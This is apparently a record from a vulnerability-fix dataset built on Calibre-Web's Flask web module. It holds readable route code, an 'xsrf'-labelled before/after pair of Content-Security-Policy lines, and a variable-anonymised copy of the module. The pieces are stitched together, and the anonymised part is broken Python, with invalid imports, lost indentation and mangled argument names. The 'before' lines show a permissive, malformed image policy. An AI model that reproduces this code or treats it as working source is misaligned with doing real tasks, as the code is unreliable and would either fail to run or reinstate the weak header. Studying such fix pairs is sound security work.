    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    q = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
        .outerjoin(db.Series)\
        .filter(calibre_db.common_filters(True))
    # parse multiselects to a complete dict
    tags = dict()
    elements = ['tag', 'serie', 'shelf', 'language', 'extension']
    for element in elements:
        tags['include_' + element] = term.get('include_' + element)
        tags['exclude_' + element] = term.get('exclude_' + element)
    author_name = term.get("author_name")
    book_title = term.get("book_title")
    publisher = term.get("publisher")
    pub_start = term.get("publishstart")
    pub_end = term.get("publishend")
    # NOTE(review): the low/high variables are assigned from the opposite
    # form fields ("ratinghigh" -> rating_low); verify against the search
    # form whether the field names or these assignments are crossed.
    rating_low = term.get("ratinghigh")
    rating_high = term.get("ratinglow")
    description = term.get("comment")
    read_status = term.get("read_status")
    if author_name:
        author_name = author_name.strip().lower().replace(',', '|')
    if book_title:
        book_title = book_title.strip().lower()
    if publisher:
        publisher = publisher.strip().lower()
    # searchterm collects human-readable descriptions of active filters
    # for display above the results.
    searchterm = []
    cc_present = False
    for c in cc:
        if c.datatype == "datetime":
            column_start = term.get('custom_column_' + str(c.id) + '_start')
            column_end = term.get('custom_column_' + str(c.id) + '_end')
            if column_start:
                searchterm.extend([u"{} >= {}".format(c.name,
                                                      format_date(datetime.strptime(column_start, "%Y-%m-%d"),
                                                                  format='medium',
                                                                  locale=get_locale())
                                                      )])
                cc_present = True
            if column_end:
                searchterm.extend([u"{} <= {}".format(c.name,
                                                      format_date(datetime.strptime(column_end, "%Y-%m-%d").date(),
                                                                  format='medium',
                                                                  locale=get_locale())
                                                      )])
                cc_present = True
        elif term.get('custom_column_' + str(c.id)):
            searchterm.extend([(u"{}: {}".format(c.name, term.get('custom_column_' + str(c.id))))])
            cc_present = True
    # Only build filters when at least one criterion is present; otherwise
    # the unfiltered base query is returned.
    if any(tags.values()) or author_name or book_title or publisher or pub_start or pub_end or rating_low \
        or rating_high or description or cc_present or read_status:
        searchterm, pub_start, pub_end = extend_search_term(searchterm,
                                                            author_name,
                                                            book_title,
                                                            publisher,
                                                            pub_start,
                                                            pub_end,
                                                            tags,
                                                            rating_high,
                                                            rating_low,
                                                            read_status)
        # no-op filter() kept from original; establishes the chain below
        q = q.filter()
        if author_name:
            q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_name + "%")))
        if book_title:
            q = q.filter(func.lower(db.Books.title).ilike("%" + book_title + "%"))
        if pub_start:
            q = q.filter(func.datetime(db.Books.pubdate) > func.datetime(pub_start))
        if pub_end:
            q = q.filter(func.datetime(db.Books.pubdate) < func.datetime(pub_end))
        q = adv_search_read_status(q, read_status)
        if publisher:
            q = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + publisher + "%")))
        q = adv_search_tag(q, tags['include_tag'], tags['exclude_tag'])
        q = adv_search_serie(q, tags['include_serie'], tags['exclude_serie'])
        q = adv_search_shelf(q, tags['include_shelf'], tags['exclude_shelf'])
        q = adv_search_extension(q, tags['include_extension'], tags['exclude_extension'])
        q = adv_search_language(q, tags['include_language'], tags['exclude_language'])
        q = adv_search_ratings(q, rating_high, rating_low)
        if description:
            q = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + description + "%")))
        # search custom culumns
        try:
            q = adv_search_custom_columns(cc, term, q)
        except AttributeError as ex:
            log.debug_or_exception(ex)
            flash(_("Error on search for custom columns, please restart Calibre-Web"), category="error")
    q = q.order_by(*order).all()
    # Remember the query so result ids can be reused (e.g. shelf actions).
    flask_session['query'] = json.dumps(term)
    ub.store_ids(q)
    result_count = len(q)
    if offset != None and limit != None:
        offset = int(offset)
        limit_all = offset + int(limit)
        pagination = Pagination((offset / (int(limit)) + 1), limit, result_count)
    else:
        offset = 0
        limit_all = result_count
    return render_title_template('search.html',
                                 adv_searchterm=searchterm,
                                 pagination=pagination,
                                 entries=q[offset:limit_all],
                                 result_count=result_count,
                                 title=_(u"Advanced Search"), page="advsearch")
@web.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def advanced_search_form():
    # Render the advanced-search form, including the user's readable
    # custom columns.
    return render_prepare_search_form(get_cc_columns(filter_config_custom_read=True))
# ################################### Download/Send ##################################################################
@web.route("/cover/<int:book_id>")
@login_required_if_no_ano
def get_cover(book_id):
    # Serve the cover image for *book_id*; all lookup/fallback logic lives
    # in the get_book_cover helper.
    return get_book_cover(book_id)
@web.route("/robots.txt")
def get_robots():
    # Serve the static robots.txt; deliberately has no login decorator so
    # crawlers can always fetch it.
    return send_from_directory(constants.STATIC_DIR, "robots.txt")
@web.route("/show/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/show/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@viewer_required
def serve_book(book_id, book_format, anyname):
    # Stream the raw book file to the in-browser reader, either from
    # Google Drive or from the local library.  *anyname* exists only so
    # URLs can carry a display file name; it is never used.
    book_format = book_format.split(".")[0]
    book = calibre_db.get_book(book_id)
    data = calibre_db.get_book_format(book_id, book_format.upper())
    if not data:
        return "File not in Database"
    log.info('Serving book: %s', data.name)
    if config.config_use_google_drive:
        try:
            headers = Headers()
            headers["Content-Type"] = mimetypes.types_map.get('.' + book_format, "application/octet-stream")
            df = getFileFromEbooksFolder(book.path, data.name + "." + book_format)
            return do_gdrive_download(df, headers, (book_format.upper() == 'TXT'))
        except AttributeError as ex:
            log.debug_or_exception(ex)
            return "File Not Found"
    else:
        if book_format.upper() == 'TXT':
            # TXT is re-encoded to UTF-8 because the browser reader cannot
            # guess arbitrary source encodings; chardet detects the input.
            try:
                rawdata = open(os.path.join(config.config_calibre_dir, book.path, data.name + "." + book_format),
                               "rb").read()
                result = chardet.detect(rawdata)
                return make_response(
                    rawdata.decode(result['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
            except FileNotFoundError:
                log.error("File Not Found")
                return "File Not Found"
        return send_from_directory(os.path.join(config.config_calibre_dir, book.path), data.name + "." + book_format)
@web.route("/download/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/download/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@download_required
def download_link(book_id, book_format, anyname):
    """Stream a book file to the client.

    ``anyname`` exists only so download URLs can end in a friendly file
    name; it is ignored.  Kobo devices get a dedicated client tag so the
    link helper can adjust the response for them.
    """
    # BUG FIX: request.headers.get('User-Agent') returns None when the
    # header is absent (easily the case for scripted requests), and
    # `"Kobo" in None` raised TypeError.  Default to "" instead.
    client = "kobo" if "Kobo" in request.headers.get('User-Agent', "") else ""
    return get_download_link(book_id, book_format, client)
@web.route('/send/<int:book_id>/<book_format>/<int:convert>')
@login_required
@download_required
def send_to_kindle(book_id, book_format, convert):
    """Queue *book_id* (optionally converted) for e-mail delivery to the
    current user's Send-to-Kindle address, then redirect back.

    Flashes a status message for every outcome: unconfigured mail server,
    missing kindle address, queueing success, or send error.
    """
    if not config.get_mail_server_configured():
        flash(_(u"Please configure the SMTP mail settings first..."), category="error")
    elif current_user.kindle_mail:
        result = send_mail(book_id, book_format, convert, current_user.kindle_mail, config.config_calibre_dir,
                           current_user.name)
        if result is None:
            flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=current_user.kindle_mail),
                  category="success")
            # Record the download for the user's statistics.
            ub.update_download(book_id, int(current_user.id))
        else:
            flash(_(u"Oops! There was an error sending this book: %(res)s", res=result), category="error")
    else:
        flash(_(u"Please update your profile with a valid Send to Kindle E-mail Address."), category="error")
    # SECURITY FIX (open redirect, CWE-601): previously this redirected to
    # the raw HTTP_REFERER header, letting a crafted Referer bounce the
    # user to an arbitrary external site.  redirect_back() (already used
    # by login()) validates the target is local, falling back to index.
    return redirect_back(url_for('web.index'))
# ################################### Login Logout ##################################################################
@web.route('/register', methods=['GET', 'POST'])
def register():
    # Self-service account registration.  Only available when public
    # registration is enabled and a mail server is configured, because a
    # randomly generated initial password is e-mailed to the new user.
    if not config.config_public_reg:
        abort(404)
    if current_user is not None and current_user.is_authenticated:
        return redirect(url_for('web.index'))
    if not config.get_mail_server_configured():
        flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
        return render_title_template('register.html', title=_("Register"), page="register")
    if request.method == "POST":
        to_save = request.form.to_dict()
        # When registering by e-mail only, the e-mail doubles as the user name.
        nickname = to_save["email"].strip() if config.config_register_email else to_save.get('name')
        if not nickname or not to_save.get("email"):
            flash(_(u"Please fill out all fields!"), category="error")
            return render_title_template('register.html', title=_("Register"), page="register")
        try:
            # Both helpers raise on invalid or already-taken values.
            nickname = check_username(nickname)
            email = check_email(to_save["email"])
        except Exception as ex:
            flash(str(ex), category="error")
            return render_title_template('register.html', title=_("Register"), page="register")
        content = ub.User()
        if check_valid_domain(email):
            content.name = nickname
            content.email = email
            password = generate_random_password()
            content.password = generate_password_hash(password)
            content.role = config.config_default_role
            content.sidebar_view = config.config_default_show
            try:
                ub.session.add(content)
                ub.session.commit()
                if feature_support['oauth']:
                    register_user_with_oauth(content)
                send_registration_mail(to_save["email"].strip(), nickname, password)
            except Exception:
                ub.session.rollback()
                flash(_(u"An unknown error occurred. Please try again later."), category="error")
                return render_title_template('register.html', title=_("Register"), page="register")
        else:
            # E-mail domain failed the allow/deny list check.
            flash(_(u"Your e-mail is not allowed to register"), category="error")
            log.warning('Registering failed for user "%s" e-mail address: %s', nickname, to_save["email"])
            return render_title_template('register.html', title=_("Register"), page="register")
        flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
        return redirect(url_for('web.login'))
    if feature_support['oauth']:
        register_user_with_oauth()
    return render_title_template('register.html', config=config, title=_("Register"), page="register")
@web.route('/login', methods=['GET', 'POST'])
def login():
    # Authenticate a user either against LDAP (when configured, with local
    # fallback if the server is unreachable) or the local password hash.
    # The same form also handles "forgot password" requests.
    #if not config.db_configured:
    #    log.debug(u"Redirect to initial configuration")
    #    return redirect(url_for('admin.basic_configuration'))
    if current_user is not None and current_user.is_authenticated:
        return redirect(url_for('web.index'))
    if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
        log.error(u"Cannot activate LDAP authentication")
        flash(_(u"Cannot activate LDAP authentication"), category="error")
    if request.method == "POST":
        form = request.form.to_dict()
        user = ub.session.query(ub.User).filter(func.lower(ub.User.name) == form['username'].strip().lower()) \
            .first()
        if config.config_login_type == constants.LOGIN_LDAP and services.ldap and user and form['password'] != "":
            login_result, error = services.ldap.bind_user(form['username'], form['password'])
            if login_result:
                login_user(user, remember=bool(form.get('remember_me')))
                ub.store_user_session()
                log.debug(u"You are now logged in as: '%s'", user.name)
                flash(_(u"you are now logged in as: '%(nickname)s'", nickname=user.name),
                      category="success")
                return redirect_back(url_for("web.index"))
            elif login_result is None and user and check_password_hash(str(user.password), form['password']) \
                    and user.name != "Guest":
                # login_result is None => LDAP server unreachable: fall
                # back to the locally stored password hash.
                login_user(user, remember=bool(form.get('remember_me')))
                ub.store_user_session()
                log.info("Local Fallback Login as: '%s'", user.name)
                flash(_(u"Fallback Login as: '%(nickname)s', LDAP Server not reachable, or user not known",
                        nickname=user.name),
                      category="warning")
                return redirect_back(url_for("web.index"))
            elif login_result is None:
                log.info(error)
                flash(_(u"Could not login: %(message)s", message=error), category="error")
            else:
                ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
                log.warning('LDAP Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
                flash(_(u"Wrong Username or Password"), category="error")
        else:
            ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
            if 'forgot' in form and form['forgot'] == 'forgot':
                # "Forgot password" branch: mail a new password.
                if user != None and user.name != "Guest":
                    ret, __ = reset_password(user.id)
                    if ret == 1:
                        flash(_(u"New Password was send to your email address"), category="info")
                        log.info('Password reset for user "%s" IP-address: %s', form['username'], ip_Address)
                    else:
                        log.error(u"An unknown error occurred. Please try again later")
                        flash(_(u"An unknown error occurred. Please try again later."), category="error")
                else:
                    flash(_(u"Please enter valid username to reset password"), category="error")
                    log.warning('Username missing for password reset IP-address: %s', ip_Address)
            else:
                # Plain local-database login.
                if user and check_password_hash(str(user.password), form['password']) and user.name != "Guest":
                    login_user(user, remember=bool(form.get('remember_me')))
                    ub.store_user_session()
                    log.debug(u"You are now logged in as: '%s'", user.name)
                    flash(_(u"You are now logged in as: '%(nickname)s'", nickname=user.name), category="success")
                    config.config_is_initial = False
                    return redirect_back(url_for("web.index"))
                else:
                    log.warning('Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
                    flash(_(u"Wrong Username or Password"), category="error")
    # NOTE(review): next_url comes straight from the query string and is
    # only compared against the logout URL here; confirm the login
    # template / redirect handling validates it as a local URL before
    # following it (open-redirect risk otherwise).
    next_url = request.args.get('next', default=url_for("web.index"), type=str)
    if url_for("web.logout") == next_url:
        next_url = url_for("web.index")
    return render_title_template('login.html',
                                 title=_(u"Login"),
                                 next_url=next_url,
                                 config=config,
                                 oauth_check=oauth_check,
                                 mail=config.get_mail_server_configured(), page="login")
@web.route('/logout')
@login_required
def logout():
    # End the current session and send the user back to the login page.
    authenticated = current_user is not None and current_user.is_authenticated
    if authenticated:
        # Drop the server-side session record before Flask-Login clears
        # the client session.
        ub.delete_user_session(current_user.id, flask_session.get('_id',""))
        logout_user()
        oauth_login_type = config.config_login_type in (2, 3)
        if feature_support['oauth'] and oauth_login_type:
            logout_oauth_user()
    log.debug(u"User logged out")
    return redirect(url_for('web.login'))
# ################################### Users own configuration #########################################################
def change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages):
    # Apply the POSTed profile form to *current_user* and commit.  On a
    # validation error the edit page is re-rendered immediately; on
    # success the caller (profile()) renders the page after this returns.
    to_save = request.form.to_dict()
    current_user.random_books = 0
    # Only users with the password (or admin) role may change passwords.
    if current_user.role_passwd() or current_user.role_admin():
        if to_save.get("password"):
            current_user.password = generate_password_hash(to_save["password"])
    try:
        # Each check_*/valid_* helper raises on invalid input, which is
        # caught below and flashed to the user.
        if to_save.get("kindle_mail", current_user.kindle_mail) != current_user.kindle_mail:
            current_user.kindle_mail = valid_email(to_save["kindle_mail"])
        if to_save.get("email", current_user.email) != current_user.email:
            current_user.email = check_email(to_save["email"])
        if current_user.role_admin():
            if to_save.get("name", current_user.name) != current_user.name:
                # Query User name, if not existing, change
                current_user.name = check_username(to_save["name"])
        current_user.random_books = 1 if to_save.get("show_random") == "on" else 0
        if to_save.get("default_language"):
            current_user.default_language = to_save["default_language"]
        if to_save.get("locale"):
            current_user.locale = to_save["locale"]
        current_user.kobo_only_shelves_sync = int(to_save.get("kobo_only_shelves_sync") == "on") or 0
    except Exception as ex:
        flash(str(ex), category="error")
        return render_title_template("user_edit.html",
                                     content=current_user,
                                     translations=translations,
                                     profile=1,
                                     languages=languages,
                                     title=_(u"%(name)s's profile", name=current_user.name),
                                     page="me",
                                     kobo_support=kobo_support,
                                     registered_oauth=local_oauth_check,
                                     oauth_status=oauth_status)
    # Rebuild the sidebar visibility bitmask from the checked "show_*"
    # boxes; the field name suffix after "show_" carries the bit value.
    val = 0
    for key, __ in to_save.items():
        if key.startswith('show'):
            val += int(key[5:])
    current_user.sidebar_view = val
    if to_save.get("Show_detail_random"):
        current_user.sidebar_view += constants.DETAIL_RANDOM
    try:
        ub.session.commit()
        flash(_(u"Profile updated"), category="success")
        log.debug(u"Profile updated")
    except IntegrityError:
        ub.session.rollback()
        flash(_(u"Found an existing account for this e-mail address"), category="error")
        log.debug(u"Found an existing account for this e-mail address")
    except OperationalError as e:
        ub.session.rollback()
        log.error("Database error: %s", e)
        flash(_(u"Database error: %(error)s.", error=e), category="error")
@web.route("/me", methods=["GET", "POST"])
@login_required
def profile():
    # Show (GET) or update (POST) the current user's own profile page.
    languages = calibre_db.speaking_language()
    translations = babel.list_translations() + [LC('en')]
    kobo_support = feature_support['kobo'] and config.config_kobo_sync
    # OAuth provider linkage is only shown for the GitHub/Google login type.
    if feature_support['oauth'] and config.config_login_type == 2:
        oauth_status = get_oauth_status()
        local_oauth_check = oauth_check
    else:
        oauth_status = None
        local_oauth_check = {}
    if request.method == "POST":
        # change_profile flashes its own success/error messages.
        change_profile(kobo_support, local_oauth_check, oauth_status, translations, languages)
    return render_title_template("user_edit.html",
                                 translations=translations,
                                 profile=1,
                                 languages=languages,
                                 content=current_user,
                                 kobo_support=kobo_support,
                                 title=_(u"%(name)s's profile", name=current_user.name),
                                 page="me",
                                 registered_oauth=local_oauth_check,
                                 oauth_status=oauth_status)
# ###################################Show single book ##################################################################
@web.route("/read/<int:book_id>/<book_format>")
@login_required_if_no_ano
@viewer_required
def read_book(book_id, book_format):
    # Open the in-browser reader matching *book_format* (epub/pdf/txt/
    # djvu, audio formats, or comic archives).
    book = calibre_db.get_filtered_book(book_id)
    if not book:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
        log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
        return redirect(url_for("web.index"))

    # check if book has bookmark
    bookmark = None
    if current_user.is_authenticated:
        bookmark = ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
                                                             ub.Bookmark.book_id == book_id,
                                                             ub.Bookmark.format == book_format.upper())).first()
    if book_format.lower() == "epub":
        log.debug(u"Start epub reader for %d", book_id)
        return render_title_template('read.html', bookid=book_id, title=book.title, bookmark=bookmark)
    elif book_format.lower() == "pdf":
        log.debug(u"Start pdf reader for %d", book_id)
        return render_title_template('readpdf.html', pdffile=book_id, title=book.title)
    elif book_format.lower() == "txt":
        log.debug(u"Start txt reader for %d", book_id)
        return render_title_template('readtxt.html', txtfile=book_id, title=book.title)
    elif book_format.lower() == "djvu":
        log.debug(u"Start djvu reader for %d", book_id)
        return render_title_template('readdjvu.html', djvufile=book_id, title=book.title)
    else:
        # Audio formats share the mp3 listening template.
        for fileExt in constants.EXTENSIONS_AUDIO:
            if book_format.lower() == fileExt:
                entries = calibre_db.get_filtered_book(book_id)
                log.debug(u"Start mp3 listening for %d", book_id)
                return render_title_template('listenmp3.html', mp3file=book_id, audioformat=book_format.lower(),
                                             entry=entries, bookmark=bookmark)
        # Comic archives: build a display title with series info.
        for fileExt in ["cbr", "cbt", "cbz"]:
            if book_format.lower() == fileExt:
                all_name = str(book_id)
                title = book.title
                if len(book.series):
                    title = title + " - " + book.series[0].name
                    if book.series_index:
                        title = title + " #" + '{0:.2f}'.format(book.series_index).rstrip('0').rstrip('.')
                log.debug(u"Start comic reader for %d", book_id)
                return render_title_template('readcbr.html', comicfile=all_name, title=title,
                                             extension=fileExt)
    log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
    flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
    return redirect(url_for("web.index"))
@web.route("/book/<int:book_id>")
@login_required_if_no_ano
def show_book(book_id):
    # Render the detail page for one book: languages, shelves, read and
    # archive status, and the send-to-kindle / reader format lists.
    entries = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
    if entries:
        # Localize each language entry for display.
        for index in range(0, len(entries.languages)):
            entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entries.languages[
                index].lang_code)
        #try:
        #    entries.languages[index].language_name = isoLanguages.get_language_name(get_locale(), LC.parse(entries.languages[index].lang_code)
        #        .get_language_name(get_locale())
        #except UnknownLocaleError:
        #    entries.languages[index].language_name = _(
        #        isoLanguages.get(part3=entries.languages[index].lang_code).name)
        cc = get_cc_columns(filter_config_custom_read=True)
        book_in_shelfs = []
        shelfs = ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).all()
        for entry in shelfs:
            book_in_shelfs.append(entry.shelf)
        if not current_user.is_anonymous:
            # Read status comes either from the app DB or, when configured,
            # from a calibre custom column.
            if not config.config_read_column:
                matching_have_read_book = ub.session.query(ub.ReadBook). \
                    filter(and_(ub.ReadBook.user_id == int(current_user.id), ub.ReadBook.book_id == book_id)).all()
                have_read = len(
                    matching_have_read_book) > 0 and matching_have_read_book[0].read_status == ub.ReadBook.STATUS_FINISHED
            else:
                try:
                    matching_have_read_book = getattr(entries, 'custom_column_' + str(config.config_read_column))
                    have_read = len(matching_have_read_book) > 0 and matching_have_read_book[0].value
                except (KeyError, AttributeError):
                    log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
                    have_read = None

            archived_book = ub.session.query(ub.ArchivedBook).\
                filter(and_(ub.ArchivedBook.user_id == int(current_user.id),
                            ub.ArchivedBook.book_id == book_id)).first()
            is_archived = archived_book and archived_book.is_archived

        else:
            have_read = None
            is_archived = None

        # 'sort' is the natsorted alias defined at module level (falls back
        # to builtin sorted when natsort is unavailable).
        entries.tags = sort(entries.tags, key=lambda tag: tag.name)

        entries = calibre_db.order_authors(entries)

        kindle_list = check_send_to_kindle(entries)
        reader_list = check_read_formats(entries)

        audioentries = []
        for media_format in entries.data:
            if media_format.format.lower() in constants.EXTENSIONS_AUDIO:
                audioentries.append(media_format.format.lower())

        return render_title_template('detail.html',
                                     entry=entries,
                                     audioentries=audioentries,
                                     cc=cc,
                                     is_xhr=request.headers.get('X-Requested-With')=='XMLHttpRequest',
                                     title=entries.title,
                                     books_shelfs=book_in_shelfs,
                                     have_read=have_read,
                                     is_archived=is_archived,
                                     kindle_list=kindle_list,
                                     reader_list=reader_list,
                                     page="book")
    else:
        log.debug(u"Oops! Selected book title is unavailable. File does not exist or is not accessible")
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
| xsrf | {
"code": [
" resp.headers['Content-Security-Policy'] = \"default-src 'self' 'unsafe-inline' 'unsafe-eval';\"",
" resp.headers['Content-Security-Policy'] += \"img-src * data:\""
],
"line_no": [
87,
89
]
} | {
"code": [
" resp.headers['Content-Security-Policy'] = \"default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:\"",
" resp.headers['Content-Security-Policy'] += \" *\""
],
"line_no": [
87,
89
]
} |
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import .format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as VAR_91
from flask_babel import gettext as _
from flask_login import .login_user, logout_user, login_required, VAR_87
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import .login_required_if_no_ano
from .render_template import render_title_template
VAR_0 = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo)
}
try:
from .oauth_bb import .oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
VAR_0['oauth'] = True
except ImportError:
VAR_0['oauth'] = False
VAR_100 = {}
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
try:
from natsort import natsorted as VAR_7
except ImportError:
VAR_7 = sorted # Just use regular VAR_7 then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def FUNC_0(VAR_1):
    """Attach security headers to every outgoing response.

    The Content-Security-Policy restricts image sources to this origin
    plus data: URIs; only the book-edit page (which previews covers from
    arbitrary hosts) widens img-src to any origin.
    """
    # BUG FIX: the second directive was previously concatenated without a
    # separator onto a policy already ending in ';' (producing the invalid
    # ";img-src * data:"), and the wide-open img-src applied to every
    # page.  Declare img-src in the base policy and only append the
    # wildcard source for the edit-book endpoint.
    VAR_1.headers['Content-Security-Policy'] = "default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:"
    if request.endpoint == "editbook.edit_book":
        VAR_1.headers['Content-Security-Policy'] += " *"
    VAR_1.headers['X-Content-Type-Options'] = 'nosniff'
    VAR_1.headers['X-Frame-Options'] = 'SAMEORIGIN'
    VAR_1.headers['X-XSS-Protection'] = '1; mode=block'
    VAR_1.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
    return VAR_1
VAR_2 = Blueprint('web', __name__)
VAR_3 = logger.create()
def FUNC_1(VAR_4):
@wraps(VAR_4)
def FUNC_71(*VAR_49, **VAR_50):
if VAR_87.role_download():
return VAR_4(*VAR_49, **VAR_50)
abort(403)
return FUNC_71
def FUNC_2(VAR_4):
@wraps(VAR_4)
def FUNC_71(*VAR_49, **VAR_50):
if VAR_87.role_viewer():
return VAR_4(*VAR_49, **VAR_50)
abort(403)
return FUNC_71
@VAR_2.route("/ajax/emailstat")
@login_required
def FUNC_3():
VAR_51 = WorkerThread.getInstance().tasks
return jsonify(render_task_status(VAR_51))
@VAR_2.route("/ajax/VAR_99/<int:VAR_5>/<VAR_6>", methods=['POST'])
@login_required
def VAR_99(VAR_5, VAR_6):
VAR_52 = request.form["bookmark"]
ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(VAR_87.id),
ub.Bookmark.book_id == VAR_5,
ub.Bookmark.format == VAR_6)).delete()
if not VAR_52:
ub.session_commit()
return "", 204
VAR_53 = ub.Bookmark(VAR_11=VAR_87.id,
VAR_5=book_id,
format=VAR_6,
VAR_52=bookmark_key)
ub.session.merge(VAR_53)
ub.session_commit("Bookmark for VAR_104 {} in VAR_95 {} created".format(VAR_87.id, VAR_5))
return "", 201
@VAR_2.route("/ajax/toggleread/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_5(VAR_5):
if not config.config_read_column:
VAR_95 = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.book_id == VAR_5)).first()
if VAR_95:
if VAR_95.read_status == ub.ReadBook.STATUS_FINISHED:
VAR_95.read_status = ub.ReadBook.STATUS_UNREAD
else:
VAR_95.read_status = ub.ReadBook.STATUS_FINISHED
else:
VAR_123 = ub.ReadBook(VAR_11=VAR_87.id, VAR_5 = book_id)
VAR_123.read_status = ub.ReadBook.STATUS_FINISHED
VAR_95 = VAR_123
if not VAR_95.kobo_reading_state:
VAR_124 = ub.KoboReadingState(VAR_11=VAR_87.id, VAR_5=book_id)
VAR_124.current_bookmark = ub.KoboBookmark()
VAR_124.statistics = ub.KoboStatistics()
VAR_95.kobo_reading_state = VAR_124
ub.session.merge(VAR_95)
ub.session_commit("Book {} readbit toggled".format(VAR_5))
else:
try:
calibre_db.update_title_sort(config)
VAR_95 = calibre_db.get_filtered_book(VAR_5)
VAR_26 = getattr(VAR_95, 'custom_column_' + str(config.config_read_column))
if len(VAR_26):
VAR_26[0].value = not VAR_26[0].value
calibre_db.session.commit()
else:
VAR_143 = db.cc_classes[config.config_read_column]
VAR_144 = VAR_143(value=1, VAR_95=VAR_5)
calibre_db.session.add(VAR_144)
calibre_db.session.commit()
except (KeyError, AttributeError):
VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
except (OperationalError, InvalidRequestError) as e:
calibre_db.session.rollback()
VAR_3.error(u"Read status could not set: %e", e)
return "Read status could not set: {}".format(e), 400
return ""
@VAR_2.route("/ajax/togglearchived/<int:VAR_5>", methods=['POST'])
@login_required
def FUNC_6(VAR_5):
VAR_54 = ub.session.query(ub.ArchivedBook).filter(and_(ub.ArchivedBook.user_id == int(VAR_87.id),
ub.ArchivedBook.book_id == VAR_5)).first()
if VAR_54:
VAR_54.is_archived = not VAR_54.is_archived
VAR_54.last_modified = datetime.utcnow()
else:
VAR_54 = ub.ArchivedBook(VAR_11=VAR_87.id, VAR_5=book_id)
VAR_54.is_archived = True
ub.session.merge(VAR_54)
ub.session_commit("Book {} archivebit toggled".format(VAR_5))
return ""
@VAR_2.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def FUNC_7():
VAR_55 = request.get_json()
try:
for VAR_113 in VAR_55:
for VAR_111 in VAR_55[VAR_113]:
VAR_87.set_view_property(VAR_113, VAR_111, VAR_55[VAR_113][VAR_111])
except Exception as ex:
VAR_3.error("Could not save view_settings: %r %r: %e", request, VAR_55, ex)
return "Invalid request", 400
return "1", 200
'''
@VAR_2.route("/ajax/getcomic/<int:VAR_5>/<VAR_6>/<int:VAR_9>")
@login_required
def get_comic_book(VAR_5, VAR_6, VAR_9):
VAR_95 = calibre_db.get_book(VAR_5)
if not VAR_95:
return "", 204
else:
for bookformat in VAR_95.data:
if bookformat.format.lower() == VAR_6.lower():
cbr_file = os.path.join(config.config_calibre_dir, VAR_95.path, bookformat.name) + "." + VAR_6
if VAR_6 in ("cbr", "rar"):
if VAR_0['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = VAR_7(rf.namelist())
extract = lambda VAR_9: rf.read(names[VAR_9])
except:
VAR_3.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
VAR_3.info('Unrar is not supported please install python rarfile extension')
return "", 204
elif VAR_6 in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=VAR_7(zf.namelist())
extract = lambda VAR_9: zf.read(names[VAR_9])
elif VAR_6 in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
